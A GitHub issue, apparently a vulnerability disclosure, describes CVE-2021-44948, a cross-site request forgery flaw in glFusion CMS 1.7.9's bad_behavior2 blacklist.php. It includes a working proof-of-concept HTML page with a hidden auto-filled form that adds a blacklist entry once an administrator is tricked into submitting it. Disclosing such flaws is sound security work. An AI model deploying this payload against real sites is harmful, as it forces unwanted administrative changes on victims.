Headline
CVE-2021-44948: glFusion CMS 1.7.9 blacklist.php CSRF vulnerability · Issue #486 · glFusion/glfusion
glFusion CMS 1.7.9 is affected by a Cross Site Request Forgery (CSRF) vulnerability in /public_html/admin/plugins/bad_behavior2/blacklist.php. Using the CSRF vulnerability to trick the administrator to click, an attacker can add a blacklist.
Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.255.130/glfusion-1.7.9/public_html/admin/plugins/bad_behavior2/blacklist.php" method="POST">
<input type="hidden" name="mode" value="addsave" />
<input type="hidden" name="bl_type" value="spambot_ip" />
<input type="hidden" name="bl_item" value="1.1.1.121" />
<input type="hidden" name="ban_reason" value="ipbrute" />
<input type="hidden" name="submit" value="Submit" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>